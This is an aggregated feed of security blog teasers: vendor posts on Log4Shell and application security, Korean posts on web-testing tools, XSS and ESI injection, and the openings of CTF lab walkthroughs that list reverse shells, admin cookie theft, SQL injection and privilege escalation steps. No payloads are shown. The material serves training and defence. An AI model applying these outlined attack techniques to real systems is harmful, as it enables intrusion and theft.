    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    Authz0 v1.1 Released 🎉
    Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary Add setCred command Add –include-zap flag in new command Add –include-har flag in new command Add –include-burp flag in new command Add –assert-fail-size-margin flag in new command Support multiple same assert type Improve report Fixed bugs Credentials and setCred Now, we can add credentials to the template using the setCred command.

  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here.This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )

  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    CVE-2021-22204 GitLab RCE之exiftool代码执行漏洞深入分析(二)
    目标导读 1 前言 2 前置知识 2.1 JPEG文件格式 2.2 Perl模式匹配 3 exiftool源码调试到漏洞分析 3.1 环境搭建 3.2 漏洞简介 3.3 exiftool是如何解析嵌入的0xc51b标签 3.4 exiftool是如何调用parseAnt函数 3.5 parseAnt函数分析 3.6 parseAnt漏洞分析 4 漏洞利用 4.1 DjVu文件生成 4.2 JPG文件生成 5 漏洞修复 6 总结 前言 安全研究员vakzz于4月7日在hackerone上提交了一个关于gitlab的RCE漏洞,在当时并没有提及是否需要登录gitlab进行授权利用,在10月25日该漏洞被国外安全公司通过日志分析发现未授权的在野利用,并发现了新的利用方式。根据官方漏洞通告页面得知安全的版本为13.10.3、13.9.6 和 13.8.8。该漏洞分为两个部分,分别是: CVE-2021-22005 Gitlab 未授权 exiftool RCE CVE-2021-22004 上一篇CVE-2021-22205 GitLab RCE之未授权访问深入分析(一)复现分析了第一部分也就是携带恶意文件的请求是如何通过gitlab传递到exiftool进行解析的,接下来我将分析exiftool漏洞的原理和最后的触发利用。 希望读者能读有所得,从中收获到自己独特的见解。 前置知识 同样的我也会在本篇文章中梳理一些前置知识来让读者更深入的了解漏洞,举一反三。 JPEG文件格式 本次漏洞可以通过读取正常的JPG图像文件的EXIF信息来触发漏洞,而JPEG的文件格式直接定义了e…

  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )

  • Open

    Chrome에선 이제 open 속성없이 XSS가 가능합니다.
    XSS가 가능합니다." />XSS 벡터 중 details 태그에 ontoggle 이벤트 핸들러와 open 속성을 이용한 방법이 있습니다. Chrome, Safari, Firefox, IE 모두 사용 가능하고 on* 기반의 XSS 중 비교적 쉽게 사용자 interaction을 줄일 수 있어서 자주 사용되는데요. test 최근 크롬 97 업데이트에 새로운 기능이 추가됬는데 바로 Auto-expand details elements 입니다. 직역하면 details elements에서 자동으로 expand 처리한다는 의미이고 이는 open 속성을 사용하지 않더라도 ontoggle로만 즉시 스크립트를 실행할 수 있다는 것을 의미합니다.
    안녕 Authz0, Authorization 테스트를 위한 새로운 도구 🚀
    저는 Authorization 테스트 시 ZAP의 Zest Script를 즐겨서 사용합니다. 예전에는 Burpsuite에서 Authz라는 Extension을 자주 사용했었구요. 어쩄던 이 도구들은 ZAP과 Burpsuite에 내장되어 사용되기 때문에 HTTP Raw Request를 사용할 수 있다는 엄청난 강점이 있지만, 반대로 너무 디테일한 기능과 Raw Reqeust의 필수 사용으로 인해 반대로 심플한 작업에서는 약간 불편함이 생기기 마련입니다. 그래서 지난주 주말부터 Authorization 테스트를 위해 도구를 하나 만들었고, 일요일 낮에 릴리즈하여 살짝 공유드려볼까 합니다. 오늘 소개해드릴 도구는 바로 Authz0입니다. What is Authz0 Authz0는 YAML 포맷 기반의 Template 파일을 중심으로 테스트할 URL과 Role을 구성하고, 이를 기반으로 스캔할 수 있는 도구입니다.
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )

  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )

  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )

  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )

  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )

  • Open

    Zest와 ZAP! 강력한 보안 테스트 루틴을 만들어봐요 ⚡️
    What is Zest Zest는 Mozilla 보안팀에서 만든 JSON 기반의 스크립팅 언어입니다. 보다 쉬운 웹 테스팅을 위해서 만들어졌고, 저는 테스팅 시 ZAP에서 자주 사용합니다. Zest in ZAP 사실 JSON 포맷 자체가 rewrite가 좋은 포맷은 아니라서(그래서 config는 yaml이나 toml을 많이 쓰죠) 직접 작성하면서 쓰기에는 좀 불편한 감이 많이 있습니다. 다만 이 Zest가 ZAP 안에서 사용하는 경우 GUI Interface를 통해 로직을 통제할 수 있기 때문에 이러한 불편함은 사라지게 됩니다. Zest Structure Zest는 JSON 포맷으로 스크립트의 타입, 파라미터 등을 명시할 수 있습니다.
    [Cullinan #25] 앞으로의 계획
    컬리넌 로그 #25입니다. 사실 이번에는 업데이트 로그라기 보단 앞으로의 계획을 좀 더 공유드릴까 해서 작성해봅니다. Cullinan이란? 먼저 Cullinan은 제가 작년 3월부터 시작한 토이 프로젝트로 흩어진 블로그 글을 하나의 위키 형태로 모으고 지속적으로 관리할 수 있도록 하는 프로젝트였습니다. 그 시작은 여기에 있네요. 기존의 글들을 모아 하나의 항목으로 만들고, 또 제가 안다뤘었던 항목들도 하나하나 추가하다보니 벌써 41개의 페이지가 생겼습니다. 앞으로도 많은 항목을 추가할껀데(노션에 작성중인게 잔뜩 쌓여있습니다 😅), 이제는 이를 표현하는 방법에 대해서도 조금 더 고민할까 합니다.

  • Open

    Vscode의 유용한 Extensions
    여러분들은 어떤 코드 에디터를 사용하시나요? 저는 학부생 시절부터 vim 유져었었고 이후 vim + geany, atom + vim 을 거쳐 이제 vscode와 vim을 동시에 사용하는 형태로 전환헀습니다. (말이 vim이지 사실 neovim을 써요 😅) 궁금해서 투표 올렸었는데, 예상보다 퍼센트가 훨씬 많이 차이가 났어요 (전 한 7/3 정도 생각했는데..) 어쨌던 vscode로 넘어오게 되면서 vscode의 extension을 찾아보게 됬었는데요, 여러개 설치해보면서 제가 괜찮다고 느꼈던 것들을 공유해볼까 합니다. Atom -> Vscode 저는 사실 Atom에 만족하고 잘 사용하던 유저였습니다.

  • Open

    December 2021 update for Netsparker Standard 6.3
    We’re delighted to announce the December 2021 update for Netsparker Standard 6.3. The highlights of this release are software composition analysis (SCA), the OWASP Top Ten 2021 Report, and support for scanning GraphQL APIs. READ MORE  ( 2 min )

  • Open

    나의 메인 Weapon 이야기 ⚔️ (ZAP and Proxify)
    한국 기준으로 새해까지 약 30분이 남았고, 올해의 글은 이 글이 마지막 글이 될 것 같습니다. 분명 2020 회고한지가 얼마 안된 것 같은데, 벌써 2021도 회고도 이미 지나버렸네요 😱 오늘은 제 회고 내용 중 하나인 Main Weapon에 대한 이야기를 하려고 합니다 :D Main Weapon? 여러분들은 분석 시 어떤 도구를 제일 좋아하시나요? 여기서 하나 고를 수 있는 도구를 저는 Main Weapon이라고 생각합니다. 저는 긴 시간 동안 Burpsuite 유저였었고, 2018년 정도부터 ZAP에 다시 관심이 크게 생겼고 결국 작년까지는 Burpsuite와 ZAP을 동시에 사용하는 듀얼 스타일을 고수했었습니다.

  • Open

    갑작스럽게 kubectl not found가 발생했다면 😫
    평소에 잘 쓰던 kubectl이 갑자기 not found가 발생했습니다. (아마 특정 시점에 brew upgrade로 인해 문제가 됬을 것 같아요) zsh: command not found: kubectl 이미 설치된 상태이고, 재 설치를 해도 동일했습니다. 여기저기 찾아보니 homebrew로 설치한 경우에서 이 이슈가 발생하는 것 같은데요. brew로 kubectl을 재 설치하고 brew link로 설치된 파일을 심볼릭 링크로 homebrew prefix와 연결해주면 다시 명령을 사용할 수 있습니다. $ brew reinstall kubectl $ brew link --overwrite kubernetes-cli 참고로 homebrew prefix는 homebrew에서 사용하는 PATH 경로입니다.

  • Open

    Log4 2.17 JDBCAppender RCE(CVE-2021-44832)
    또… 또나왔네요. 이전 글에서 한번에 쓰기에 너무 긴 내용이라 추가 CVE는 하나씩 분리해둘 생각입니다. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-2021-45105 (DOS) [2021-12-27] CVE-2021-44832 (RCE) Affected ≤2.17, ≤2.12.3, ≤2.3.1 위 버전이 취약합니다. 다만 무조건 취약한 상태는 아니고, 로깅 구성 파일을 수정할 수 있는 권한이 공격자에게 필요하기 때문에 공격 성공을 위해선 MITM 등의 부가적인 요소가 필요합니다. 그래서 이전 RCE 처럼 Critical 이슈는 아니고 Major(CVSS 6.

  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )

  • Open

    ZAP의 새로운 Import/Export Addon, 그리고 미래에 대한 뇌피셜
    최근에 ZAP 내 여러가지 Import, Save 관련 기능들이 “Import/Export"란 이름의 새로운 Addon으로 통합되었습니다. 사용자 Interface 상에선 변화가 없어서 크게 달라진 건 없지만 이를 통해 앞으로의 ZAP에서 Import/Export 기능에 대한 방향성을 엿볼 수 있어서 글로 작성해봅니다 😎 Import files containing URLs Log File Importer Save Raw Message Save XML Message 새로 추가된 Import/Export의 실제 Addon 이름은 exim입니다. EXIM은 EXport & IMport의 약자로 웹에서도 동일한 의미로 많이 쓰이는 말입니다. ZAP의 Addon은 API를 제공하도록 어느정도 강제하고 있는 사항이라 exim도 API로 제공되고 있습니다.
    Web Cache 취약점들을 스캐닝하자 🔭
    Web Cache Poisoning, Web Cache Deception 등 Web Cache 관련 취약점은 나름 오래된 기법이지만 요 몇 년 사이 알비노왁스(@albinowax) 등 Portswigger의 연구원들에 의해 빠르게 발전한 것 같습니다. 이러한 취약점들은 여러가지 테스팅 방법을 통해서 식별하고 Exploit 하지만 이전까진 크게 강력하다고 생각하던 도구가 없었던 상태입니다. (그나마 burpsuite의 내장 스캐너가 있겠네요…) 오늘은 Web Cache 취약점을 빠르게 식별할 수 있는 좋은 도구가 있어서 공유할까합니다! 사실 제가 관련 도구를 올 여름(21년 6월쯤?) 정도부터 아주 천천히 만들고 있었는데, Hackmanit에서 선수를 처버렸네요.

  • Open

    Dalfox 2.7 Released 🎉
    Hi hackers! Dalfox v2.7 has been released 🎉🎉🎉 There are not many added features this release. But it’s better than before, so I recommend an update! Then let’s start the review. and Have a great holiday 🧑🏼‍🎄 Thank you ❤️ First, Thank you so much all contributors !! Thanks to our, this project is getting better and better. Thank you always! Release note Github | DockerHub Add BAV Module ESI Injection Support to windows/arm64 Upgrade go dependency (1.

  • Open

    Links Digest 2021
    What I am currently reading The following is a list of books that I am currently reading. I like to read several books simultaneously to have more options in case I am not ready to absorb specific content. Sapiens: A Brief History of Humankind by Yuval Noah Harari A Brief History of Time by Stephen Hawking How to avoid a climate disaster by Bill Gates The Ride of a Lifetime: Lessons in Creative Leadership from 15 Years as CEO of the Walt Disney by Robert Iger The Double Helix by James Watson Tao Te Ching by Lao Tzu Notes from the Underground by Fyodor Dostoyevsky What I've read The following is a list of books that I've read and recommend to others to read or browse through. This list is not complete and sorted in no particular order. Some books are better than others. One day I will provi…
    Links Digest 2021
    A short list of useful links. Security Blogs https://0x00sec.org/ - don't know yet but it looks interesting https://abiondo.me - ctf and other hacking things from a talanted hacker https://www.vulnano.com/ - small blog but cool nevertheless https://bugbountyforum.com/ - interesting info about bug bounties https://xz.aliyun.com/ - interesting blog full of exploits and stuff https://sites.google.com/securifyinc.com/secblogs/table-of-contents - very cool research https://spaceraccoon.dev/ - bug bounty stuff https://samcurry.net - bug bounty stuff Zines https://www.alchemistowl.org/pocorgtfo/ - pocorgtfo https://secret.club - a zine but pretty compact and down to the point https://pagedout.institute/ - not sure yet Reference https://github.com/ngalongc/bug-bounty-reference https://cxsecurity.c…

  • Open

    Log4j vulnerability resource center
    Watch this space for the latest news and resources from Invicti on the Log4j crisis. READ MORE  ( 2 min )

  • Open

    ZAP과 Burpsuite에서 feedback 정보를 수집하지 못하도록 제한하기
    최근에 ZAP의 Core addon 중 하나인 Callhome이 업데이트 되었습니다. 기존에 Callhome은 단순히 메인에 News 정보를 보여주기 위해 만들어진 기능인데, 이번에 Telemetry 관련 부분이 추가됬습니다. Telemetry는 ZAP 사용성 정보등을 수집하기 위한 기능인데요, ZAP쪽 설명으로는 취약점이나 개인정보 등은 수집하지 않고 단순 통계 정도만 수집한다고 합니다. 어쨌던 저처럼 이런 정보 수집에 민감하신 분들은 별도로 Disable 처리 하셔야할 것 같습니다. (Burpsuite는 오래전부터… 😱) 오늘은 겸사겸사 ZAP과 Burpsuite에서 이러한 사용성 정보를 수집하는 이유와 이를 Disable 하는 방법에 대해 정리해둘까 합니다.

  • Open

    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec. READ MORE  ( 4 min )
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there’s a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows. READ MORE  ( 6 min )

  • Open

    [Cullinan #24] Add ESI Injection and Update Others
    컬리넌 업데이트 로그 #24입니다. ESI Injection을 추가했고, SSTI에 RCE 관련 내용 추가, 그리고 도구 업데이트가 있었습니다. 마지막으로 Cullinan의 메인 페이지 디자인의 일부를 수정(max-width 제거)했습니다. Add ESI Injection Update SSTI (Add RCE, Update Tools) Update Cullinan Design ESI Injection은 제가 블로그 글로 공유드린지 벌써 3년도 넘은 항목인데요, 실무에서도 자주 보이는 케이스는 아니라서 잊고 있다가 최근에 Cullinan 쪽으로 추가하게 됬습니다. 그래도 재미있는 취약점이니 한번쯤은 읽어보시는 것 추천드립니다 :D

  • Open

    ESI(Edge Side Include) Injection
    🔍 Introduction ESIi는 ESI(Edge Side Include) Injection으로 ESI 사용하는 환경에서 해당 Markup에 대한 Injection 공격을 의미합니다. ESI는 Edge Side Include의 약자로 인터넷의 Edge에서 웹 애플리케이션의 동적 어셈블리 및 전송을 위한 웹 페이지 구성 요소를 정의하는 데 사용되는 간단한 마크업 언어입니다. Page assembly를 위한 표준 태그로 웹 캐시, LB 등의 구조에서 사용됩니다. HTML 코드 내에서 ESI는 아래와 같이 태그로 웹 브라우저로 Response body가 넘어오기 전에 ESI를 처리할 수 있는 캐시 서버등에서 미리 처리되어 데이터가 넘어오게 됩니다.

  • Open

    Apache Log4j 2, Flexera and you
    By now, you’ve probably learned of Apache Log4j 2. As reported across the web, there is the recently disclosed CVE-2021-44228 vulnerability in Apache Log4j 2 (widely referred to as Log4Shell) affecting organizations far and wide. This is a critical vulnerability in Apache Log4j 2, impacting versions from 2.0-beta9 to 2.14.1. And now you’ve likely been asking, “Where is this vulnerability within my own IT ecosystem, and how do I mitigate it if necessary?” Flexera is helping work through the issue with our customers by ensuring immediate visibility of the impact of this and other vulnerabilities within their IT estate. Flexera…

  • Open

    Why Log4Shell could be the worst software vulnerability ever
    Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library. This post summarizes what we know so far about the Log4Shell vulnerability, how you can mitigate it, how to find it using Netsparker, and what it means for cybersecurity here and now. READ MORE  ( 5 min )

  • Open

    Private OOB 테스팅을 위한 Self Hosted Interactsh
    이번 주말은 log4shell로 인해 정말 인터넷이 불타고 있습니다. 자 이제 보안담당자들은 이를 대응하고 자산에 대해 스캐닝을 진행하게 될텐데, 여기서 식별에 사용하는 대표적인 방법인 OOB(Out-Of-Band)를 알려진 서비스들(ZAP OAST, Burpsuite collaborator, Interactsh 등)을 이용하여 편하게 테스팅할 수 있겠지만, 이는 결국 외부에 callback이 발생한 서버의 IP가 남게되고, 이를 통해서 해당 서비스를 운영하는 운영하는 회사 또는 그룹 등 정보를 얻어갈 수 있는 구간이 존재하게 됩니다. (썩 좋은 그림은 아니죠) 그래서 오늘은 Private하게 OOB를 테스트할 수 있도록 VPC와 DNS Glue Record를 이용하여 interactsh 서버를 따로 구축하고 사용하는 방법에 대해 이야기할까 합니다.

  • Open

    Log4shell 전 세계의 인터넷이 불타고 있습니다 🔥 (CVE-2021-44228/CVE-2021-45046/CVE-2021-45105)
    네 바로 어제(2021-12-10) Java의 logging package인 log4j2 에서 RCE 0-day 취약점이 공개되었습니다. Service, Application에 로그를 쌓을수만 있다면 어떤 환경에서도 공격 가능성이 존재하고, 리스크가 RCE인 만큼 정말 전 세계가 불타오르고 있네요. (하하 DM도 터져나갑니다. 안볼거에요……) 일이 우선이니 어제는 대응에 집중하고, 하루 늦은 오늘 글로 공유하려고 합니다. 어디가… 사실 아직 끝난게 아니야… 이후에도 추가건인 CVE-2021-45046과 CVE-2021-45105로 대응해야 할 것들이 더 있어서 최초 공개인 금요일부터 그 다음주까진 정신없이 보냈던 것 같습니다. 아무튼 모든 Security engineer와 Developer, DevOps 등 이 사건으로 고생하신 모든 분들께 경의를 표합니다 👏🏼
    웹 해커를 위한 Browser Addons
    여러분들은 보안 테스팅 시 웹 브라우저 Addon 많이 사용하시나요? 저는 한 떄 엄청나게 많이 설치해서 사용했지만, 지금은 5개 미만을 유지하는 것 같네요. 오늘은 보안 테스팅 시 유용한 Addon을 소개하고 제가 어떤식으로 변화하며 사용했는지 공유드릴까 합니다. TLDR Name Firefox Chrome 😎 Darkreader Firefox Addons Chrome store 🎩 Eval Villian Firefox Addons, Github 🖥 postMessage-tracker Github 🍪 Cookie-quick-manager Firefox Addons, Github 🍪 Edit-This-Cookie Chrome store, Github 🗑 Clear cache Firefox Addons, Github Chrome store 👩🏽‍💻 JWT Debugger (Github) Firefox Addons Chrome store 변화 저는 예전에는 브라우저 Addon을 많이 사용 했었습니다.

  • Open

    Five fundamental tips for getting executive buy-in on AppSec
    Demonstrating AppSec value to executives can be an uphill battle. This post show how, with the right metrics and planning, getting C-suite buy-in for application security can become much easier. READ MORE  ( 5 min )

  • Open

    Introduction to GraphQL API security
    GraphQL is a data query and manipulation language for building APIs that is quickly gaining popularity. While it comes with built-in validation and type-checking, it also has its share of security shortcomings that attackers can exploit to access sensitive data. READ MORE  ( 6 min )

  • Open

    ZAP RootCA를 API와 Cli-Arguments로 제어하기
    ZAP에 새로운 Addon이 추가됬습니다. 이 Addon을 이용하면 ZAP의 인증서, 즉 Root CA를 API나 Cli등으로 컨트롤할 수 있도록 기능이 지원됩니다. 이를 활용하면 Daemon 모드로 동작하거나 CI/CD Pipeline 등에서 사용 시 조금 더 쉽게 인증서 처리를 할 수 있게 됩니다. 오늘은 ZAP의 RootCA, 즉 인증서를 API/CLI의 Arguments 등으로 쉽게 처리할 수 있는 Network addon과 어떻게 동작하는지 알아보도록 합시다 🚀 Network addon Network addon은 특별한 기능이 있는 Addon은 아니고, ZAP의 Certificate 지원을 위해 추가된 Addon 입니다.

  • Open

    December 2021 update for Netsparker Enterprise On-Premises
    This blog post announces the December 2021 update for Netsparker Enterprise On-Premises, highlighting tagging, a login warning banner, encryption, and the integrations with ServiceNow Vulnerability Management and DefectDojo. READ MORE  ( 2 min )

  • Open

    The SANS/CWE Top 25 dangerous software errors of 2021
    Since we last looked at it in 2019, the SANS/CWE Top 25 list has been updated twice. Let’s see what this year’s SANS Top 25 tells us about the state of software security in 2021 and how it relates to the latest OWASP Top 10. READ MORE  ( 6 min )

  • Open

    Building a secure SDLC for web applications
    A predictable and efficient software development lifecycle (SDLC) is crucial for delivering modern web applications on schedule, in scope, and within budget. Building security into the application lifecycle is not an easy task, so let’s see how you can integrate application security best practices to create a secure software development life cycle. READ MORE  ( 6 min )

  • Open

    The secret to getting results, not noise, from your DAST solution
    Products for dynamic application security testing (DAST) vary widely in quality and capabilities. A low-quality tool that merely ticks a box will do little to improve security and may generate more work than it saves. But a mature, high-quality solution can bring measurable security improvements and serve as a solid foundation for your entire AppSec program, as our infographic shows. READ MORE  ( 3 min )

  • Open

    Vulnerability scanning with PAM in zero trust environments
    Never trust, always check – that’s the zero trust motto. Enterprises and government agencies alike are rushing to implement at least some zero trust technologies, notably privileged access management (PAM), but this may have a knock-on effect on application security testing. Learn how modern AppSec solutions integrate with PAM platforms to ensure accurate testing even in locked-down environments. READ MORE  ( 4 min )

  • Open

    Decrypt As If Your Security Depends on It
    Encryption has reached near-full adoption by internal teams hoping to implement stronger security and privacy practices. Simultaneously, attackers are using the same mechanisms to hide their malicious activity from the defender’s line of sight. According to the Ponemon Institute’s 2021 Global Encryption Trends Study, 50% of organizations have an encryption plan consistently applied across their […] The post Decrypt As If Your Security Depends on It appeared first on Security Weekly.  ( 2 min )

  • Open

    DevSecOps Scanning Challenges & Tips
    There are many ways to do DevSecOps, and each organization — each security team, even — uses a different approach. Questions such as how many environments you have and the frequency of deployment of those environments are important in understanding how to integrate a security scanner into your DevSecOps machinery. The ultimate goal is speed […] The post DevSecOps Scanning Challenges & Tips appeared first on Security Weekly.  ( 2 min )

  • Open

    It Should Be ‘Cybersecurity Culture Month’
    It’s Cybersecurity Awareness Month, but security awareness is about much more than just dedicating a month to a few activities. Security awareness is a journey, requiring motivation along the way. And culture. Especially culture.That’s the point Proofpoint Cybersecurity Evangelist Brian Reed drove home in a recent appearance on Business Security Weekly.“If your security awareness program […] The post It Should Be ‘Cybersecurity Culture Month’ appeared first on Security Weekly.  ( 2 min )

  • Open

    TryHackMe > Unbaked Pie
    Don’t over-baked your pie! Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas. Contents 1 User Flag 1.1 Services 1.2 Django application 1.3 Pickle in the search 1.4 Exploit 1.5 Evade docker 1.6 Database 1.7 Brute force ramsey’s SSH account 1.8 Ramsey’s flag 2 Root Flag 2.1 Lateral move (ramsey -> oliver) 2.2 Privilege escalation User Flag Services Running Nmap will only reveal 1 open port: PORT STATE SERVICE VERSION 5003/tcp open filemaker? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Sat, 05 Jun 2021 05:28:13 GMT | Server: WSGIServer/0.2 CPython/3.8.6…

  • Open

    TryHackMe > Cooctus Stories
    This room is about the Cooctus Clan. Previously on Cooctus Tracker Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01) Present times Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans. Note: A stable shell is recommended, so try and SSH into users when possible. Con…
    TryHackMe > VulnNet Roasted
    VulnNet Entertainment quickly deployed another management instance on their very broad network… VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing. Difficulty: Easy Operating System: Windows This is a much simpler machine, do not overthink. You can do it by following common methodologies. Note: It might take up to 6 minutes for this machine to fully boot. Author: TheCyb3rW0lf Discord: TheCyb3rW0lf#8594 Icon made by DinosoftLabs from www.flaticon.com Contents 1 What is the user flag? (Desktop.txt) 1.1 Services 1.2 Samba 1.3 Find users 1.4 Find users without K…

  • Open

    TryHackMe > VulnNet Internal
    VulnNet Entertainment learns from its mistakes, and now they have something new for you… VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings. Difficulty: Easy/Medium Operating System: Linux This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags. Note: It might take …

  • Open

    TryHackMe > toc2
    It’s a setup... Can you get the flags in time? I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson Contents 1 Find and retrieve the user.txt flag 1.1 Services 1.2 CMS information 1.3 CMS Made Simple / Reverse Shell 1.4 User flag 2 Escalate your privileges and acquire root.txt 2.1 Lateral move (www-data -> frank) 2.2 The readcreds binary 2.3 Race condition 2.4 Root flag Find and retrieve the user.txt flag Services Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA) | 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA) …

  • Open

    TryHackMe > The Marketplace
    Can you take over The Marketplace’s infrastructure? The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out. Can you take advantage of this and will you be able to gain root access on his server? Contents 1 What is flag 1? 1.1 Services 1.2 Web application 1.3 Token cookie 1.4 XSS vulnerability 1.5 Stealing the admin cookie 2 What is flag 2? (User.txt) 2.1 SQLi vulnerability 2.2 Exploit the SQL injection 2.2.1 Database and tables 2.2.2 Users table 2.2.3 Messages table 2.3 Connect as jake 3 What is flag 3? (Root.txt) 3.1 Lateral move (jake -> michael) 3.…

  • Open

    TryHackMe > Debug
    Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Contents 1 User flag 1.1 Open ports 1.2 Web enumeration 1.3 The index.php.bak file 1.4 PHP serialization exploit 1.5 James password 1.6 User flag 2 Root flag 2.1 Message from root 2.2 The motd service 2.3 Reverse shell and root flag User flag Open ports Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA) | 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA) |_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519) 80/tcp open http …

  • Open

    TryHackMe > En-pass
    Get what you can’t. Think-out-of-the-box Contents 1 Name The Path. 1.1 Enumeration (1st level) 1.2 The zip directory 1.3 The web directory 2 What is the user flag? 2.1 SSH private key 2.2 The reg.php page 2.3 403 Fuzzing 2.4 SSH Connection 3 What is the root flag? 3.1 Cronjob 3.2 The script 3.3 Exploit 3.4 Root shell Name The Path. Nmap detects 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA) | 256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA) |_ 256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519) 8001/tcp open http Apache httpd 2.4.18 ((…

  • Open

    TryHackMe > Wekor
